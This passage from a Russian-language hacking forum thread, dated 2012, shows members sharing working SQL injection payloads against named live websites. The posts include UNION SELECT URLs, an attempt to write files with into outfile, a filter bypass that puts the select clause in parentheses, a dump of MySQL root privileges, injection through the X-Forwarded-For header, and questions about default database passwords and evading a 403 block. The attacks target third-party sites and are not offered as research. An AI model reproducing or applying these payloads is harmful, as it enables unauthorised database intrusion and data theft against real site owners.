HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21861  
Старый 20.12.2012, 18:16
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Цитата:
Сообщение от qwwertty  
qwwertty said:
Ты не прав, скорее всего база пуста.
В базе mysql у рута пустой пароль(локалхост), но вторая запись выглядит както странно - ни логина ни пароля, только запись "локалхост"
В теории тут FILE_PRIV=Y но на практике /etc/passwd не читает
Проверил ещё раз.

Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+

File_Priv=N

_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
 
Ответить с цитированием

  #21862  
Старый 20.12.2012, 18:27
qwwertty
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301

Репутация: 0
По умолчанию

Цитата:
Сообщение от BigBear  
BigBear said:
Проверил ещё раз.
Извиняюсь, был не прав. Фильтруется не точка - фильтруются запросы из information_shema
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,@@versi on,3,4+from+lory.books+--+
File_Priv=N
_ttp://www.lory-press.ru/showreview.php?id=1+and+1=2+union+select+1,222,3,4 +from+lory.books+into+outfile+'/tmp/1.txt'+--+
И правда, но кое что есть

Data Found: Host:Userassword:Update_priv:Insert_priv:Select_pr iv:Create_user_priv:Grant_privelete_privrop_priv:C reate_priv:File_priv

localhost:root: :Y:Y:Y:Y:Y:Y:Y:Y:N

PS чтото получше sqlihelpera для дампа есть?
 
Ответить с цитированием

  #21863  
Старый 20.12.2012, 18:35
kcash
Познающий
Регистрация: 06.04.2009
Сообщений: 30
Провел на форуме:
60216

Репутация: 0
По умолчанию

господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql

там есть помимо прочих и такие:
[*] cacti [1]:
[*] debian-sys-maint [1]:
[*] f2 [1]:
[*] frontend [1]:
[*] replication [1]:
[*] wizard [1]:

есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?
 
Ответить с цитированием

  #21864  
Старый 20.12.2012, 23:19
0xd098d0b3d0
Guest
Сообщений: n/a
Провел на форуме:
21406

Репутация: 0
По умолчанию

http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+

как обойти блок select ??
 
Ответить с цитированием

  #21865  
Старый 21.12.2012, 01:36
kcash
Познающий
Регистрация: 06.04.2009
Сообщений: 30
Провел на форуме:
60216

Репутация: 0
По умолчанию

Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?
 
Ответить с цитированием

  #21866  
Старый 21.12.2012, 01:44
qaz
Guest
Сообщений: n/a
Провел на форуме:
344922

Репутация: 75
По умолчанию

Цитата:
Сообщение от kcash  
kcash said:
Вопрос знатокам. Если Havij и Sqlmap не справляются, а уязвимость sql-inj есть, есть ли третий вариант?
да. руки и мозг

Цитата:
Сообщение от kcash  
kcash said:
господа, приветствую. Вот sqlmap'ом посотрел список юзеров mysql
там есть помимо прочих и такие:[*] cacti [1]:[*] debian-sys-maint [1]:[*] f2 [1]:[*] frontend [1]:[*] replication [1]:[*] wizard [1]:
есть ли для них дефалтовые пароли? Что это вообще за движок передо мной судя по набору юзеров?
какой ещо движок???? ето пароли от майскул базы
 
Ответить с цитированием

  #21867  
Старый 21.12.2012, 02:09
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от 0xd098d0b3d0  
0xd098d0b3d0 said:
http://sahyadhri.com/tourism/cities.php?id=4+union+select+1,2,3,4,5,6,7,8,9,10, 11,12,13,14+--+
как обойти блок select ??
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+

тут фильтрация связки union+select , а не только select
 
Ответить с цитированием

  #21868  
Старый 21.12.2012, 02:18
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию

Нашел sqli в хттп заголовках X-Forwarded-For:

Когда сделал запрос X-Forwarded-For: ' order by 2# мне ответили:

General Error This account disabled

Потом X-Forwarded-For: ' order by 3# и мне ответили:

General Error SQL ERROR [ mysql4 ] Unknown column '3' in 'order clause' [1054]

Я так понял, что там всего 2 поля...

Но когда вбиваю X-Forwarded-For: ' union select 1,2# мне пишут мол

General Error SQL ERROR [ mysql4 ] Unknown table 's' in field list [1109]

как раскрутить?
 
Ответить с цитированием

  #21869  
Старый 21.12.2012, 02:26
qwwertty
Новичок
Регистрация: 26.12.2009
Сообщений: 3
Провел на форуме:
7301

Репутация: 0
По умолчанию

Цитата:
Сообщение от smirk  
smirk said:
http://sahyadhri.com/tourism/cities.php?id=-4+union(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14)+--+
тут фильтрация связки union+select , а не только select
Код:
Code:
_ttp://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,%28user%28%29%29,%28version%28%29%29,%28database%28%29%29,5,6,7,8,9,10,11,12,13,14%29+--+
 
Ответить с цитированием

  #21870  
Старый 21.12.2012, 02:42
0xd098d0b3d0
Guest
Сообщений: n/a
Провел на форуме:
21406

Репутация: 0
По умолчанию

Код:
Code:
http://sahyadhri.com/tourism/cities.php?id=-4+union%28select+1,2,3,4,5,6,7,8,9,10,11,12,13,14%29+from+information_schema.tables+--+
А обойти 403 в таком запросе получиться??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ